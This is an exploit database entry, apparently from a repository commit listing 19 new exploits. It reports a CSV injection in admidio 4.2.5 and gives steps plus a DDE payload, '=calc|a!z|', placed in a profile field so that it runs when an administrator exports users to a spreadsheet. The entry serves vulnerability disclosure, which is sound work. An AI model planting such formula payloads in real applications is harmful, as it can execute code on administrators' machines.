668314bbda
19 changes to exploits/shellcodes/ghdb FS-S3900-24T4S - Privilege Escalation Virtual Reception v1.0 - Web Server Directory Traversal admidio v4.2.5 - CSV Injection Companymaps v8.0 - Stored Cross Site Scripting (XSS) GLPI 9.5.7 - Username Enumeration OpenEMR v7.0.1 - Authentication credentials brute force PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) PHPJabbers Simple CMS 5.0 - SQL Injection PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) phpMyFAQ v3.1.12 - CSV Injection projectSend r1605 - Private file download revive-adserver v5.4.1 - Cross-Site Scripting (XSS) Serendipity 2.4.0 - File Inclusion RCE SoftExpert (SE) Suite v2.1.3 - Local File Inclusion Advanced Host Monitor v12.56 - Unquoted Service Path MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
21 lines
No EOL
861 B
Text
21 lines
No EOL
861 B
Text
Exploit Title: admidio v4.2.5 - CSV Injection
|
|
Application: admidio
|
|
Version: 4.2.5
|
|
Bugs: CSV Injection
|
|
Technology: PHP
|
|
Vendor URL: https://www.admidio.org/
|
|
Software Link: https://www.admidio.org/download.php
|
|
Date of found: 26.04.2023
|
|
Author: Mirabbas Ağalarov
|
|
Tested on: Windows
|
|
|
|
|
|
2. Technical Details & POC
|
|
========================================
|
|
Step 1. login as user
|
|
step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2)
|
|
step 3. If admin Export users as CSV or excell file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2)
|
|
|
|
payload: =calc|a!z|
|
|
|
|
Poc video: https://www.youtube.com/watch?v=iygwj1izSMQ |